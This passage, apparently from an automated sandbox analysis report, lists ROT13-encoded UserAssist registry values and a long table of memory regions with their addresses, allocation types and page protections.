HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 27 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
220D0000
|
trusted library allocation
|
page read and write
|
|
|
|
220F4000
|
trusted library allocation
|
page read and write
|
|
|
|
9760000
|
direct allocation
|
page execute and read and write
|
|
|
|
ACC4000
|
direct allocation
|
page execute and read and write
|
|
|
|
59E2000
|
trusted library allocation
|
page read and write
|
|
|
|
2259006D000
|
trusted library allocation
|
page read and write
|
|
|
|
220A4000
|
trusted library allocation
|
page read and write
|
|
|
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
7FF888490000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
22580993000
|
trusted library allocation
|
page read and write
|
||
|
21B0000
|
trusted library allocation
|
page read and write
|
||
|
24661000
|
trusted library allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
direct allocation
|
page read and write
|
||
|
7FF888630000
|
trusted library allocation
|
page read and write
|
||
|
42AE000
|
stack
|
page read and write
|
||
|
7FF888460000
|
trusted library allocation
|
page read and write
|
||
|
2415D000
|
heap
|
page read and write
|
||
|
2145379E000
|
heap
|
page read and write
|
||
|
220CE000
|
trusted library allocation
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
8491000
|
trusted library allocation
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D75000
|
heap
|
page read and write
|
||
|
8290000
|
heap
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
7595000
|
trusted library allocation
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
7140000
|
direct allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
812F5FF000
|
stack
|
page read and write
|
||
|
42B0000
|
heap
|
page read and write
|
||
|
FD9B6FC000
|
stack
|
page read and write
|
||
|
9740000
|
trusted library allocation
|
page read and write
|
||
|
218CE2B0000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F457A000
|
heap
|
page read and write
|
||
|
6D95000
|
heap
|
page execute and read and write
|
||
|
24F60000
|
trusted library allocation
|
page read and write
|
||
|
225F4BF7000
|
heap
|
page execute and read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
72EC000
|
heap
|
page read and write
|
||
|
21453777000
|
heap
|
page read and write
|
||
|
214537B5000
|
heap
|
page read and write
|
||
|
2413D000
|
heap
|
page read and write
|
||
|
24137000
|
heap
|
page read and write
|
||
|
21E4E000
|
stack
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
28CA1B30000
|
heap
|
page read and write
|
||
|
225821F6000
|
trusted library allocation
|
page read and write
|
||
|
737D000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
22581FF3000
|
trusted library allocation
|
page read and write
|
||
|
A2C4000
|
direct allocation
|
page execute and read and write
|
||
|
21BAF000
|
stack
|
page read and write
|
||
|
5F7000
|
unkown
|
page readonly
|
||
|
6671000
|
heap
|
page read and write
|
||
|
225F4510000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F2C55000
|
heap
|
page read and write
|
||
|
22580001000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E30000
|
direct allocation
|
page read and write
|
||
|
225F28DC000
|
heap
|
page read and write
|
||
|
94A0000
|
trusted library allocation
|
page read and write
|
||
|
B6C4000
|
direct allocation
|
page execute and read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
6460000
|
heap
|
page readonly
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
2419E000
|
heap
|
page read and write
|
||
|
668D000
|
heap
|
page read and write
|
||
|
21EE8000
|
trusted library allocation
|
page read and write
|
||
|
24148000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
22580B27000
|
trusted library allocation
|
page read and write
|
||
|
21B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
668D000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
4E4E000
|
stack
|
page read and write
|
||
|
2EC4000
|
trusted library allocation
|
page read and write
|
||
|
28CA1C40000
|
heap
|
page read and write
|
||
|
2465E000
|
stack
|
page read and write
|
||
|
951C000
|
stack
|
page read and write
|
||
|
22581FD2000
|
trusted library allocation
|
page read and write
|
||
|
225F4270000
|
trusted library allocation
|
page read and write
|
||
|
60D000
|
unkown
|
page readonly
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888530000
|
trusted library allocation
|
page read and write
|
||
|
6620000
|
direct allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
1EF000
|
stack
|
page read and write
|
||
|
6590000
|
direct allocation
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888471000
|
trusted library allocation
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
2145561E000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
471F000
|
stack
|
page read and write
|
||
|
5F1000
|
unkown
|
page execute read
|
||
|
225F2840000
|
heap
|
page read and write
|
||
|
21453AE0000
|
heap
|
page read and write
|
||
|
225F4690000
|
heap
|
page execute and read and write
|
||
|
9730000
|
trusted library allocation
|
page read and write
|
||
|
21453814000
|
heap
|
page read and write
|
||
|
246C0000
|
trusted library allocation
|
page read and write
|
||
|
2EF5000
|
trusted library allocation
|
page execute and read and write
|
||
|
B3D000
|
stack
|
page read and write
|
||
|
C0D000
|
stack
|
page read and write
|
||
|
21B1D000
|
stack
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
7373000
|
heap
|
page read and write
|
||
|
7FF8882C0000
|
trusted library allocation
|
page read and write
|
||
|
245DF000
|
stack
|
page read and write
|
||
|
5AF000
|
stack
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page execute and read and write
|
||
|
665C000
|
heap
|
page read and write
|
||
|
225F2C10000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
220F0000
|
trusted library allocation
|
page read and write
|
||
|
214537FD000
|
heap
|
page read and write
|
||
|
7FF8882C4000
|
trusted library allocation
|
page read and write
|
||
|
225F4CBF000
|
heap
|
page read and write
|
||
|
60D000
|
unkown
|
page readonly
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
669B000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
214537E5000
|
heap
|
page read and write
|
||
|
24690000
|
trusted library allocation
|
page read and write
|
||
|
82BA000
|
heap
|
page read and write
|
||
|
B7E000
|
stack
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
2183000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
77BB000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
21453846000
|
heap
|
page read and write
|
||
|
8776000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
A130000
|
direct allocation
|
page execute and read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
225F452A000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
7FF8884F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888540000
|
trusted library allocation
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
5F5000
|
unkown
|
page readonly
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
A5CA7CF000
|
stack
|
page read and write
|
||
|
21453814000
|
heap
|
page read and write
|
||
|
2411B000
|
heap
|
page read and write
|
||
|
225F2945000
|
heap
|
page read and write
|
||
|
2EC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
4AC0000
|
heap
|
page read and write
|
||
|
24690000
|
trusted library allocation
|
page read and write
|
||
|
21453770000
|
heap
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
812F8FF000
|
stack
|
page read and write
|
||
|
4BF4000
|
remote allocation
|
page execute and read and write
|
||
|
66EB000
|
heap
|
page read and write
|
||
|
C0C4000
|
direct allocation
|
page execute and read and write
|
||
|
41EB000
|
stack
|
page read and write
|
||
|
6D90000
|
heap
|
page execute and read and write
|
||
|
7FF8883A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF888370000
|
trusted library allocation
|
page read and write
|
||
|
21F80000
|
trusted library allocation
|
page read and write
|
||
|
A5CABFF000
|
stack
|
page read and write
|
||
|
22060000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F4380000
|
heap
|
page read and write
|
||
|
225F42B0000
|
trusted library allocation
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
22580B08000
|
trusted library allocation
|
page read and write
|
||
|
65E0000
|
direct allocation
|
page read and write
|
||
|
7FF888550000
|
trusted library allocation
|
page read and write
|
||
|
67AE000
|
stack
|
page read and write
|
||
|
225F4320000
|
trusted library allocation
|
page read and write
|
||
|
66A6000
|
heap
|
page read and write
|
||
|
246AD000
|
stack
|
page read and write
|
||
|
72B0000
|
heap
|
page read and write
|
||
|
6E7EEFF000
|
stack
|
page read and write
|
||
|
7150000
|
direct allocation
|
page read and write
|
||
|
2180000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882C2000
|
trusted library allocation
|
page read and write
|
||
|
21FA6000
|
trusted library allocation
|
page read and write
|
||
|
5851000
|
trusted library allocation
|
page read and write
|
||
|
218CE2A0000
|
heap
|
page read and write
|
||
|
7FF8885F0000
|
trusted library allocation
|
page read and write
|
||
|
24F60000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
214537D8000
|
heap
|
page read and write
|
||
|
225F2850000
|
heap
|
page read and write
|
||
|
94B0000
|
trusted library allocation
|
page read and write
|
||
|
968C000
|
stack
|
page read and write
|
||
|
225F28F7000
|
heap
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885B0000
|
trusted library allocation
|
page read and write
|
||
|
A5CB0FE000
|
stack
|
page read and write
|
||
|
218CE540000
|
heap
|
page read and write
|
||
|
24663000
|
trusted library allocation
|
page read and write
|
||
|
812F199000
|
stack
|
page read and write
|
||
|
7FF888380000
|
trusted library allocation
|
page execute and read and write
|
||
|
240F8000
|
heap
|
page read and write
|
||
|
21D8A000
|
stack
|
page read and write
|
||
|
28CA1C45000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
214537D1000
|
heap
|
page read and write
|
||
|
7FF8884E0000
|
trusted library allocation
|
page read and write
|
||
|
2170000
|
trusted library allocation
|
page read and write
|
||
|
214537D8000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
21D1F000
|
stack
|
page read and write
|
||
|
225F4390000
|
heap
|
page read and write
|
||
|
7FF8882C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
66EC000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8884C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888600000
|
trusted library allocation
|
page read and write
|
||
|
21FC6000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
A5CBD4B000
|
stack
|
page read and write
|
||
|
214537D1000
|
heap
|
page read and write
|
||
|
A5CBDCB000
|
stack
|
page read and write
|
||
|
831A000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
812F9FF000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
6700000
|
heap
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
A5CAEF7000
|
stack
|
page read and write
|
||
|
241F0000
|
heap
|
page read and write
|
||
|
2415D000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
214537B2000
|
heap
|
page read and write
|
||
|
4ABB000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
2EF2000
|
trusted library allocation
|
page read and write
|
||
|
8147000
|
stack
|
page read and write
|
||
|
23071000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
214551D0000
|
heap
|
page read and write
|
||
|
2415D000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
2939000
|
stack
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
225820DC000
|
trusted library allocation
|
page read and write
|
||
|
41A0000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
5F1000
|
unkown
|
page execute read
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
8778000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
66B6000
|
heap
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
72FC000
|
heap
|
page read and write
|
||
|
218CE6E0000
|
heap
|
page read and write
|
||
|
22580552000
|
trusted library allocation
|
page read and write
|
||
|
225F461B000
|
heap
|
page read and write
|
||
|
22580086000
|
trusted library allocation
|
page read and write
|
||
|
6440000
|
heap
|
page read and write
|
||
|
225F4C97000
|
heap
|
page read and write
|
||
|
246B0000
|
trusted library allocation
|
page read and write
|
||
|
5F7000
|
unkown
|
page readonly
|
||
|
2708000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
2D0C000
|
heap
|
page read and write
|
||
|
21C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F25000
|
heap
|
page read and write
|
||
|
246D0000
|
trusted library allocation
|
page read and write
|
||
|
21BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C7D000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
66B6000
|
heap
|
page read and write
|
||
|
240C8000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
A5CB27B000
|
stack
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
82F4000
|
heap
|
page read and write
|
||
|
22071000
|
trusted library allocation
|
page read and write
|
||
|
66F5000
|
heap
|
page read and write
|
||
|
225F2940000
|
heap
|
page read and write
|
||
|
246A0000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
21455610000
|
heap
|
page read and write
|
||
|
246E0000
|
trusted library allocation
|
page read and write
|
||
|
218CE37A000
|
heap
|
page read and write
|
||
|
766E000
|
stack
|
page read and write
|
||
|
66A3000
|
heap
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
497C000
|
stack
|
page read and write
|
||
|
219D000
|
trusted library allocation
|
page execute and read and write
|
||
|
241A2000
|
heap
|
page read and write
|
||
|
21E8C000
|
stack
|
page read and write
|
||
|
240F3000
|
heap
|
page read and write
|
||
|
2476E000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
240D0000
|
heap
|
page execute and read and write
|
||
|
22050000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
7FF88837C000
|
trusted library allocation
|
page execute and read and write
|
||
|
214536E0000
|
heap
|
page read and write
|
||
|
5F1000
|
unkown
|
page execute read
|
||
|
7FF888590000
|
trusted library allocation
|
page read and write
|
||
|
2EEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
214537FA000
|
heap
|
page read and write
|
||
|
BB000
|
stack
|
page read and write
|
||
|
469E000
|
stack
|
page read and write
|
||
|
21CA0000
|
remote allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
964E000
|
stack
|
page read and write
|
||
|
2FAA000
|
trusted library allocation
|
page read and write
|
||
|
214537F2000
|
heap
|
page read and write
|
||
|
66EB000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
3660000
|
remote allocation
|
page execute and read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
A3C000
|
stack
|
page read and write
|
||
|
481C000
|
stack
|
page read and write
|
||
|
2461E000
|
stack
|
page read and write
|
||
|
7FF888480000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8882D0000
|
trusted library allocation
|
page read and write
|
||
|
21FC1000
|
trusted library allocation
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
339F000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
2258221D000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
21453AED000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
7335000
|
heap
|
page read and write
|
||
|
22050000
|
trusted library allocation
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
24661000
|
trusted library allocation
|
page read and write
|
||
|
7FF888500000
|
trusted library allocation
|
page read and write
|
||
|
246B0000
|
trusted library allocation
|
page read and write
|
||
|
2F97000
|
trusted library allocation
|
page read and write
|
||
|
240E1000
|
heap
|
page read and write
|
||
|
2258056F000
|
trusted library allocation
|
page read and write
|
||
|
21B2000
|
trusted library allocation
|
page read and write
|
||
|
225F28BE000
|
heap
|
page read and write
|
||
|
7130000
|
direct allocation
|
page read and write
|
||
|
7358000
|
heap
|
page read and write
|
||
|
2711000
|
heap
|
page read and write
|
||
|
2C60000
|
trusted library section
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
5F7000
|
unkown
|
page readonly
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
2ED9000
|
trusted library allocation
|
page read and write
|
||
|
220E2000
|
trusted library allocation
|
page read and write
|
||
|
24117000
|
heap
|
page read and write
|
||
|
A5CAC7D000
|
stack
|
page read and write
|
||
|
A5CB1FE000
|
stack
|
page read and write
|
||
|
225F4BF0000
|
heap
|
page execute and read and write
|
||
|
66F5000
|
heap
|
page read and write
|
||
|
73B7000
|
trusted library allocation
|
page read and write
|
||
|
21FF0000
|
trusted library allocation
|
page read and write
|
||
|
22581C18000
|
trusted library allocation
|
page read and write
|
||
|
21A0000
|
trusted library allocation
|
page read and write
|
||
|
22050000
|
trusted library allocation
|
page read and write
|
||
|
2204C000
|
stack
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
24125000
|
heap
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
96DE000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
225F46C0000
|
heap
|
page execute and read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
60D000
|
unkown
|
page readonly
|
||
|
225821FA000
|
trusted library allocation
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
37F4000
|
remote allocation
|
page execute and read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24672000
|
trusted library allocation
|
page read and write
|
||
|
6610000
|
direct allocation
|
page read and write
|
||
|
22580AEA000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
246B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
21FCD000
|
trusted library allocation
|
page read and write
|
||
|
21455612000
|
heap
|
page read and write
|
||
|
2F8E000
|
stack
|
page read and write
|
||
|
21453826000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
24690000
|
trusted library allocation
|
page read and write
|
||
|
225F4CC6000
|
heap
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
21453823000
|
heap
|
page read and write
|
||
|
669E000
|
heap
|
page read and write
|
||
|
225F4A33000
|
heap
|
page read and write
|
||
|
7FF8885A0000
|
trusted library allocation
|
page read and write
|
||
|
A5CA783000
|
stack
|
page read and write
|
||
|
21D30000
|
direct allocation
|
page read and write
|
||
|
21453803000
|
heap
|
page read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
6E7EDFF000
|
unkown
|
page read and write
|
||
|
A5CACFE000
|
stack
|
page read and write
|
||
|
73D2000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
669E000
|
heap
|
page read and write
|
||
|
AB9000
|
heap
|
page read and write
|
||
|
225F28F9000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
81DE000
|
stack
|
page read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
FD9B7FF000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
6702000
|
heap
|
page read and write
|
||
|
6580000
|
direct allocation
|
page read and write
|
||
|
214537DE000
|
heap
|
page read and write
|
||
|
6638000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
218CE2D0000
|
heap
|
page read and write
|
||
|
2419E000
|
heap
|
page read and write
|
||
|
214537F1000
|
heap
|
page read and write
|
||
|
97F0000
|
trusted library allocation
|
page read and write
|
||
|
665D000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
A5CAD7E000
|
stack
|
page read and write
|
||
|
4840000
|
heap
|
page execute and read and write
|
||
|
21F90000
|
trusted library allocation
|
page read and write
|
||
|
9690000
|
trusted library allocation
|
page execute and read and write
|
||
|
66E1000
|
heap
|
page read and write
|
||
|
7FF888580000
|
trusted library allocation
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
21FBE000
|
trusted library allocation
|
page read and write
|
||
|
21FD2000
|
trusted library allocation
|
page read and write
|
||
|
2459D000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
4229000
|
stack
|
page read and write
|
||
|
7FF888610000
|
trusted library allocation
|
page read and write
|
||
|
2258203E000
|
trusted library allocation
|
page read and write
|
||
|
214537C1000
|
heap
|
page read and write
|
||
|
2258076D000
|
trusted library allocation
|
page read and write
|
||
|
214537C5000
|
heap
|
page read and write
|
||
|
22580B3F000
|
trusted library allocation
|
page read and write
|
||
|
7554000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
A5CAEFE000
|
stack
|
page read and write
|
||
|
225F4578000
|
heap
|
page read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
21A2000
|
trusted library allocation
|
page read and write
|
||
|
21453804000
|
heap
|
page read and write
|
||
|
21ADD000
|
stack
|
page read and write
|
||
|
506F000
|
stack
|
page read and write
|
||
|
6671000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
9720000
|
trusted library allocation
|
page read and write
|
||
|
66A6000
|
heap
|
page read and write
|
||
|
22581FDF000
|
trusted library allocation
|
page read and write
|
||
|
6600000
|
direct allocation
|
page read and write
|
||
|
21E0E000
|
stack
|
page read and write
|
||
|
225F28FD000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
46DE000
|
stack
|
page read and write
|
||
|
2EE8000
|
heap
|
page read and write
|
||
|
246D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
240F4000
|
heap
|
page read and write
|
||
|
246A0000
|
trusted library allocation
|
page read and write
|
||
|
220FC000
|
trusted library allocation
|
page read and write
|
||
|
9810000
|
direct allocation
|
page read and write
|
||
|
22590001000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
23099000
|
trusted library allocation
|
page read and write
|
||
|
6C8E000
|
stack
|
page read and write
|
||
|
7FF888640000
|
trusted library allocation
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
21FA0000
|
trusted library allocation
|
page read and write
|
||
|
22581FB4000
|
trusted library allocation
|
page read and write
|
||
|
22000000
|
heap
|
page execute and read and write
|
||
|
A5CB17E000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
6630000
|
heap
|
page read and write
|
||
|
738E000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
21453AE5000
|
heap
|
page read and write
|
||
|
2411E000
|
heap
|
page read and write
|
||
|
214537D6000
|
heap
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
21FAE000
|
trusted library allocation
|
page read and write
|
||
|
21BFD000
|
stack
|
page read and write
|
||
|
7FF88831C000
|
trusted library allocation
|
page execute and read and write
|
||
|
60D000
|
unkown
|
page readonly
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
2145385D000
|
heap
|
page read and write
|
||
|
2258052D000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
67E7000
|
heap
|
page read and write
|
||
|
7FF8883E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2418B000
|
heap
|
page read and write
|
||
|
2EA0000
|
trusted library section
|
page read and write
|
||
|
7FF888520000
|
trusted library allocation
|
page read and write
|
||
|
214537EC000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page readonly
|
||
|
28FB000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
21DC9000
|
stack
|
page read and write
|
||
|
30AB000
|
heap
|
page read and write
|
||
|
218CE6E5000
|
heap
|
page read and write
|
||
|
21455614000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24DE7000
|
trusted library allocation
|
page read and write
|
||
|
28CA1A30000
|
heap
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
7FF888376000
|
trusted library allocation
|
page read and write
|
||
|
24671000
|
trusted library allocation
|
page read and write
|
||
|
812FDFF000
|
stack
|
page read and write
|
||
|
B0D000
|
stack
|
page read and write
|
||
|
22582221000
|
trusted library allocation
|
page read and write
|
||
|
82E8000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
F9000
|
stack
|
page read and write
|
||
|
24200000
|
heap
|
page read and write
|
||
|
2258203B000
|
trusted library allocation
|
page read and write
|
||
|
214537DE000
|
heap
|
page read and write
